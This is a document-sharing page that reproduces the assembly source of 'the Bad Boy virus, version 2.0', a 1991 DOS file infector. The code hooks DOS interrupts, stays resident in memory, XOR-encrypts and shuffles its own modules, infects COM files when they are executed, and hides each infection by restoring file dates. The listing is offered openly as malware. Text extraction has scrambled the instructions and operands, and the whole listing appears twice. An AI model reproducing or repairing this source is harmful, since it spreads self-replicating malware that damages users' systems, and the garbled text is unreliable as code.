Bad Boy 20
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Bad Boy 20 as PDF for free.
More details
- Words: 1,383
- Pages: 9
code
start:
curofs files fsize ftime fdate stdint21 oldint13 oldint21 oldint24
segment assume cs:code,ds:code .radix 16 org 100 push push pop jmp
word ptr cs:[table+2] cs ds word ptr cs:[table]
db dw dw dw
dw 0 2 ? ? dd dd dd dd
;go to module 1
? ;number of infected files from this copy ;size of infected file ? ? ? ?
;------------- table with module parameters -------------------table: dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e dw dw dw dw dw dw dw dw
offset offset offset offset offset offset offset offset
mod_2 mod_3 mod_4 mod_5 mod_6 mod_7 mod_8 myend
-
offset offset offset offset offset offset offset offset
mod_1;10 mod_2;12 mod_3;14 mod_4;16 mod_5;18 ;size modules mod_6;1a mod_7;1c mod_8;1e
;------------- module - 1 - coder/decoder ---------------------mod_1: mov bx,offset table+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset table+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx
loop pop pop add loop ret
mod_1_lp2 cx bx bx,2 mod_1_lp1
;------------- module - 2 - mutation to memory ----------------mod_2: ;instalation check mov mov mov mov repe jne jmp mod_2_install:
mod_2_cont:
es,cs:[2] di,100 si,100 cx,0bh cmpsb mod_2_install word ptr cs:[table+06]
;memory size
;jump if not install ;if install, jump to module 4
;instalation
mov dec mov
ax,cs ax ds,ax
cmp je
byte ptr ds:[0],'z' mod_2_cont
jmp
word ptr cs:[table+6]
sub mov sub mov mov push pop
word ptr ds:[3],0c0 ax,es ax,0c0 es,ax word ptr ds:[12],ax cs ds
;if no last mcb - go to mod4
;decrement memory size with 2k
mod_2_mut:
mod_2_lp1:
mov
byte ptr cs:files,0
mov mov mov rep
di,100 cx,offset mod_1-100 si,100 movsb ;write table to new memory
mov add xor
bx,word ptr cs:[table] bx,offset mod_1_lp2-offset mod_1+1 byte ptr [bx],18 ;change code method
mov mov
cx,8 word ptr curofs,offset mod_1
push cx call mod_2_rnd ;generate random module addres push bx ;addres in table returned from mod_2_rnd
mov push add mov pop pop xchg mov rep xchg mov or pop loop mov not mov mod_2_lp2:
ax,[bx] ;offset module ax bx,10 cx,[bx] ;length of module si bx di,curofs word ptr es:[bx],di ;change module offset in table movsb ;copy module to new memory di,curofs ;change current offset in new memory ax,8000 word ptr [bx],ax ;mark module - used cx mod_2_lp1 cl,8 ax bx,offset table
and word ptr [bx],ax add bx,2 loop mod_2_lp2
;unmark all modules
jmp
word ptr cs:[table+4]
push push xor mov
cx es cx,cx es,cx
;go to module 3
mod_2_rnd:
mod_2_lp3:
mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset table test [bx],8000 jnz mod_2_lp3 pop es pop cx ret
;------------- module - 3 - set interrupt vectors --------------mod_3: xor ax,ax mov ds,ax mov mov mov mov
ax,ds:[4*21] word ptr es:[oldint21],ax ax,ds:[4*21+2] word ptr es:[oldint21+2],ax
mov int cmp jne
ah,30 21 ax,1e03 mod_3_getvec
mov mov push
word ptr es:[stdint21],1460 ax,1203 ds
int mov pop jmp
2f word ptr es:[stdint21+2],ds ds mod_3_setvec
mod_3_getvec: mov mov mov mov
ax,ds:[4*21] word ptr es:[stdint21],ax ax,ds:[4*21+2] word ptr es:[stdint21+2],ax
mod_3_setvec: cli mov mov mov mov sti
ax,word ptr es:[table+0c] ds:[4*21],ax ax,es ds:[4*21+2],ax
mov mov int push mov mov mov pop int
cx,es ah,13 ; 2f ; es ; es,cx ; word ptr es:[oldint13],dx ; get standart int13 addres word ptr es:[oldint13+2],ds ; es ; 2f ;
jmp
word ptr cs:[table+06]
;go to module 4
;------------- module - 4 - restore old program code & start ---mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[table+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100
mod_4_cnt:
cmp jnc mov
si,offset myend+1 mod_4_cnt si,offset myend+1
mov mov rep mov
di,100 cx,offset myend-100 movsb ax,100 ;
push ret
ax
; jmp 100 ;
;------------- module - 5 - special program --------------------mod_5: xor di,di mov ds,di cli mov di,word ptr cs:[oldint21] mov ds:[4*21],di mov di,word ptr cs:[oldint21+2] mov ds:[4*21+2],di sti ret db 'make me better!' ;------------- module - 6 - int 24 header ----------------------mod_6: mov al,3 iret db 'the bad boy virus, version 2.0, copyright (c) 1991.',0 ;------------- module - 7 - int 21 header ----------------------mod_7: push bx push si push di push es push ax cmp je jmp mod_7_begin: push push pop xor mov mov mov movsw movsw mov cli mov mov mov sti pop
ax,4b00 mod_7_begin mod_7_exit
mov pushf call jc mov mod_7_infect:
ax,3d00
ds cs es ax,ax ds,ax si,4*24 di,offset oldint24
; ;
; ; ax,word ptr cs:[table+0a] ; ds:[4*24],ax ax,cs ds:[4*24+2],ax
; ; ; ; change int24 vector ; ; ; ;
ds
cs:oldint21 mod_7_ex bx,ax
; ;
; ; open,infect,close file ; ;
mod_7_ex:
call pushf mov pushf call popf jc
word ptr cs:[table+0e]
;
push cli xor mov mov xchg mov mov xchg mov sti pop
ds
push xor mov mov mov mov mov pop
ds ; ax,ax ds,ax ax,word ptr cs:oldint24 ds:[4*24],ax ax,word ptr cs:oldint24+2 ds:[4*24+2],ax ds ;
pop pop pop pop pop
ax es di si bx
jmp
cs:oldint21
ah,3e
; ;
cs:oldint21
;
mod_7_ex ; ;
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; exchange int13 vectors ax,word ptr cs:[oldint13+2] ; ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ; ; ; ;
; ; restore int24 vector
;
mod_7_exit:
;------------- module - 8 - infecting (bx - file handle) -------mod_8: push cx push dx push ds push es push di push bp push mov int mov xor mov int pop
bx ax,1220 2f bl,es:[di] bh,bh ax,1216 2f bx
mov
ax,word ptr es:[di+11]
cmp jc jmp
ax,0f000 mod_8_c mod_8_exit
mov
word ptr es:[di+2],2
mov mov
ax,es:[di+11] cs:fsize,ax
mov mov mov mov
ax,word ptr es:[di+0dh] word ptr cs:[ftime],ax ax,word ptr es:[di+0f] word ptr cs:[fdate],ax
push pop mov mov mov pushf call jnc jmp
cs ; ds ; dx,offset myend+1 cx,offset myend-100 ah,3f
mod_8_c:
mod_8_cnt:
mov mov mov cmp jne jmp mod_8_nxtchk: xchg cmp jne jmp
;open mode - r/w ; save file size ; ; save file date/time ; ;
; ; read first bytes ;
cs:oldint21 mod_8_cnt mod_8_exit bp,ax si,dx ax,'mz' ax,word ptr ds:[si] mod_8_nxtchk mod_8_exit
; ax - bytes read
ah,al ax,ds:[si] mod_8_cnt2 mod_8_exit
mod_8_cnt2:
mod_8_cnt1:
push push push pop mov mov mov repe pop pop jne jmp
es di cs es si,100 di,dx cx,0bh cmpsb di es mod_8_cnt1 mod_8_exit
mov
word ptr es:[di+15],0
push push mov add
es di si,word ptr cs:[table+0e] si,offset mod_8_cont - offset mod_8
; ; ; ; check for infected file ; ; ; ; fp:=0
xor push pop mov cld rep pop pop
di,di cs es cx,offset mod_8_cont_end - offset mod_8_cont
mov add push xor push
si,word ptr cs:[table+0e] si,offset mod_8_cont_end - offset mod_8 si si,si si
push cli xor mov mov xchg mov mov xchg mov sti pop
ds
movsb di es
; ;
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; ax,word ptr cs:[oldint13+2] ; exchange int13 vectors ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ;
ret mod_8_cont: push call pop
bx word ptr cs:[table] bx
mov mov mov pushf call
dx,100 ah,40 cx,offset myend-0ff ; cs:stdint21
pushf push call pop popf jnc pop mov add push ret mod_8_cont1: mov mov mov mov
bx word ptr cs:[table] bx
; code virus ; ; write code in begin ;
; decode virus
mod_8_cont1 ax ax,word ptr cs:[table+0e] ax,offset mod_8_ext - offset mod_8 ax ax,es:[di+11] ; fp:=end of file word ptr es:[di+15],ax ; dx,offset myend+1 cx,bp
; bp - files read
mov pushf call
ah,40
; ;
cs:stdint21
; write in end of file
ret mod_8_cont_end: mov mov mov pushf call
mod_8_exit: mod_8_ext: mod_8_ex:
ax,5701 cx,cs:ftime dx,cs:fdate ; cs:oldint21
; ; ; restore file date/time ;
inc cmp jne call jmp
cs:files cs:files,0a mod_8_ext word ptr cs:[table+8] short mod_8_ext
stc jmp
short mod_8_ex
clc pop pop pop pop pop pop ret
bp di es ds dx cx
;--------------------------------------------------------------myend
db int
false_mod_1: mov ret code
0 20
;code of infected file
word ptr cs:[table],offset mod_1
ends end start
start:
curofs files fsize ftime fdate stdint21 oldint13 oldint21 oldint24
segment assume cs:code,ds:code .radix 16 org 100 push push pop jmp
word ptr cs:[table+2] cs ds word ptr cs:[table]
db dw dw dw
dw 0 2 ? ? dd dd dd dd
;go to module 1
? ;number of infected files from this copy ;size of infected file ? ? ? ?
;------------- table with module parameters -------------------table: dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e dw dw dw dw dw dw dw dw
offset offset offset offset offset offset offset offset
mod_2 mod_3 mod_4 mod_5 mod_6 mod_7 mod_8 myend
-
offset offset offset offset offset offset offset offset
mod_1;10 mod_2;12 mod_3;14 mod_4;16 mod_5;18 ;size modules mod_6;1a mod_7;1c mod_8;1e
;------------- module - 1 - coder/decoder ---------------------mod_1: mov bx,offset table+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset table+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx
loop pop pop add loop ret
mod_1_lp2 cx bx bx,2 mod_1_lp1
;------------- module - 2 - mutation to memory ----------------mod_2: ;instalation check mov mov mov mov repe jne jmp mod_2_install:
mod_2_cont:
es,cs:[2] di,100 si,100 cx,0bh cmpsb mod_2_install word ptr cs:[table+06]
;memory size
;jump if not install ;if install, jump to module 4
;instalation
mov dec mov
ax,cs ax ds,ax
cmp je
byte ptr ds:[0],'z' mod_2_cont
jmp
word ptr cs:[table+6]
sub mov sub mov mov push pop
word ptr ds:[3],0c0 ax,es ax,0c0 es,ax word ptr ds:[12],ax cs ds
;if no last mcb - go to mod4
;decrement memory size with 2k
mod_2_mut:
mod_2_lp1:
mov
byte ptr cs:files,0
mov mov mov rep
di,100 cx,offset mod_1-100 si,100 movsb ;write table to new memory
mov add xor
bx,word ptr cs:[table] bx,offset mod_1_lp2-offset mod_1+1 byte ptr [bx],18 ;change code method
mov mov
cx,8 word ptr curofs,offset mod_1
push cx call mod_2_rnd ;generate random module addres push bx ;addres in table returned from mod_2_rnd
mov push add mov pop pop xchg mov rep xchg mov or pop loop mov not mov mod_2_lp2:
ax,[bx] ;offset module ax bx,10 cx,[bx] ;length of module si bx di,curofs word ptr es:[bx],di ;change module offset in table movsb ;copy module to new memory di,curofs ;change current offset in new memory ax,8000 word ptr [bx],ax ;mark module - used cx mod_2_lp1 cl,8 ax bx,offset table
and word ptr [bx],ax add bx,2 loop mod_2_lp2
;unmark all modules
jmp
word ptr cs:[table+4]
push push xor mov
cx es cx,cx es,cx
;go to module 3
mod_2_rnd:
mod_2_lp3:
mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset table test [bx],8000 jnz mod_2_lp3 pop es pop cx ret
;------------- module - 3 - set interrupt vectors --------------mod_3: xor ax,ax mov ds,ax mov mov mov mov
ax,ds:[4*21] word ptr es:[oldint21],ax ax,ds:[4*21+2] word ptr es:[oldint21+2],ax
mov int cmp jne
ah,30 21 ax,1e03 mod_3_getvec
mov mov push
word ptr es:[stdint21],1460 ax,1203 ds
int mov pop jmp
2f word ptr es:[stdint21+2],ds ds mod_3_setvec
mod_3_getvec: mov mov mov mov
ax,ds:[4*21] word ptr es:[stdint21],ax ax,ds:[4*21+2] word ptr es:[stdint21+2],ax
mod_3_setvec: cli mov mov mov mov sti
ax,word ptr es:[table+0c] ds:[4*21],ax ax,es ds:[4*21+2],ax
mov mov int push mov mov mov pop int
cx,es ah,13 ; 2f ; es ; es,cx ; word ptr es:[oldint13],dx ; get standart int13 addres word ptr es:[oldint13+2],ds ; es ; 2f ;
jmp
word ptr cs:[table+06]
;go to module 4
;------------- module - 4 - restore old program code & start ---mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[table+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100
mod_4_cnt:
cmp jnc mov
si,offset myend+1 mod_4_cnt si,offset myend+1
mov mov rep mov
di,100 cx,offset myend-100 movsb ax,100 ;
push ret
ax
; jmp 100 ;
;------------- module - 5 - special program --------------------mod_5: xor di,di mov ds,di cli mov di,word ptr cs:[oldint21] mov ds:[4*21],di mov di,word ptr cs:[oldint21+2] mov ds:[4*21+2],di sti ret db 'make me better!' ;------------- module - 6 - int 24 header ----------------------mod_6: mov al,3 iret db 'the bad boy virus, version 2.0, copyright (c) 1991.',0 ;------------- module - 7 - int 21 header ----------------------mod_7: push bx push si push di push es push ax cmp je jmp mod_7_begin: push push pop xor mov mov mov movsw movsw mov cli mov mov mov sti pop
ax,4b00 mod_7_begin mod_7_exit
mov pushf call jc mov mod_7_infect:
ax,3d00
ds cs es ax,ax ds,ax si,4*24 di,offset oldint24
; ;
; ; ax,word ptr cs:[table+0a] ; ds:[4*24],ax ax,cs ds:[4*24+2],ax
; ; ; ; change int24 vector ; ; ; ;
ds
cs:oldint21 mod_7_ex bx,ax
; ;
; ; open,infect,close file ; ;
mod_7_ex:
call pushf mov pushf call popf jc
word ptr cs:[table+0e]
;
push cli xor mov mov xchg mov mov xchg mov sti pop
ds
push xor mov mov mov mov mov pop
ds ; ax,ax ds,ax ax,word ptr cs:oldint24 ds:[4*24],ax ax,word ptr cs:oldint24+2 ds:[4*24+2],ax ds ;
pop pop pop pop pop
ax es di si bx
jmp
cs:oldint21
ah,3e
; ;
cs:oldint21
;
mod_7_ex ; ;
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; exchange int13 vectors ax,word ptr cs:[oldint13+2] ; ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ; ; ; ;
; ; restore int24 vector
;
mod_7_exit:
;------------- module - 8 - infecting (bx - file handle) -------mod_8: push cx push dx push ds push es push di push bp push mov int mov xor mov int pop
bx ax,1220 2f bl,es:[di] bh,bh ax,1216 2f bx
mov
ax,word ptr es:[di+11]
cmp jc jmp
ax,0f000 mod_8_c mod_8_exit
mov
word ptr es:[di+2],2
mov mov
ax,es:[di+11] cs:fsize,ax
mov mov mov mov
ax,word ptr es:[di+0dh] word ptr cs:[ftime],ax ax,word ptr es:[di+0f] word ptr cs:[fdate],ax
push pop mov mov mov pushf call jnc jmp
cs ; ds ; dx,offset myend+1 cx,offset myend-100 ah,3f
mod_8_c:
mod_8_cnt:
mov mov mov cmp jne jmp mod_8_nxtchk: xchg cmp jne jmp
;open mode - r/w ; save file size ; ; save file date/time ; ;
; ; read first bytes ;
cs:oldint21 mod_8_cnt mod_8_exit bp,ax si,dx ax,'mz' ax,word ptr ds:[si] mod_8_nxtchk mod_8_exit
; ax - bytes read
ah,al ax,ds:[si] mod_8_cnt2 mod_8_exit
mod_8_cnt2:
mod_8_cnt1:
push push push pop mov mov mov repe pop pop jne jmp
es di cs es si,100 di,dx cx,0bh cmpsb di es mod_8_cnt1 mod_8_exit
mov
word ptr es:[di+15],0
push push mov add
es di si,word ptr cs:[table+0e] si,offset mod_8_cont - offset mod_8
; ; ; ; check for infected file ; ; ; ; fp:=0
xor push pop mov cld rep pop pop
di,di cs es cx,offset mod_8_cont_end - offset mod_8_cont
mov add push xor push
si,word ptr cs:[table+0e] si,offset mod_8_cont_end - offset mod_8 si si,si si
push cli xor mov mov xchg mov mov xchg mov sti pop
ds
movsb di es
; ;
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; ax,word ptr cs:[oldint13+2] ; exchange int13 vectors ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ;
ret mod_8_cont: push call pop
bx word ptr cs:[table] bx
mov mov mov pushf call
dx,100 ah,40 cx,offset myend-0ff ; cs:stdint21
pushf push call pop popf jnc pop mov add push ret mod_8_cont1: mov mov mov mov
bx word ptr cs:[table] bx
; code virus ; ; write code in begin ;
; decode virus
mod_8_cont1 ax ax,word ptr cs:[table+0e] ax,offset mod_8_ext - offset mod_8 ax ax,es:[di+11] ; fp:=end of file word ptr es:[di+15],ax ; dx,offset myend+1 cx,bp
; bp - files read
mov pushf call
ah,40
; ;
cs:stdint21
; write in end of file
ret mod_8_cont_end: mov mov mov pushf call
mod_8_exit: mod_8_ext: mod_8_ex:
ax,5701 cx,cs:ftime dx,cs:fdate ; cs:oldint21
; ; ; restore file date/time ;
inc cmp jne call jmp
cs:files cs:files,0a mod_8_ext word ptr cs:[table+8] short mod_8_ext
stc jmp
short mod_8_ex
clc pop pop pop pop pop pop ret
bp di es ds dx cx
;--------------------------------------------------------------myend
db int
false_mod_1: mov ret code
0 20
;code of infected file
word ptr cs:[table],offset mod_1
ends end start
Related Documents
Bad Boy 20
November 2019 13
Bad Tea Boy
May 2020 12
Bad Boy For Little Girl.pdf
July 2020 7
Si Oded The Bad Boy
July 2020 15
Boy
July 2020 20